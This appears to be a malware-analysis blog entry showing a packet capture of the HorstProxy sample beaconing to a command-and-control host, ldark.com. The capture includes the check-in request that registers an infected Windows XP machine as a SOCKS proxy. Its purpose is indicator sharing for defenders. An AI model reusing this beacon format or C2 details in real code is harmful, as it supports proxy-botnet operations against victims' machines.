Tag Archives: HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

HISTORICAL Malware Sample – HorstProxy – Traffic Sample Indicators Analysis

2013-05-12 14:32:23.969210 IP 172.16.253.129.1057 > 69.43.161.152.80: Flags [P.], seq 1:126, ack 1, win 64240, length 125
E….;@…i…..E+…!.P.r……P…F\..GET /socks/proxy.php?ip=172.16.253.129&port=41080&os=XP&iso=USA&smtp=0 HTTP/1.1
User-Agent: Mozilla/5.0
Host: ldark.com

2013-05-12 14:32:23.969386 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [.], ack 126, win 64240, length 0
E..(……..E+…….P.!…..r..P………….
2013-05-12 14:32:24.102970 IP 69.43.161.152.80 > 172.16.253.129.1057: Flags [FP.], seq 1:290, ack 126, win 64240, length…
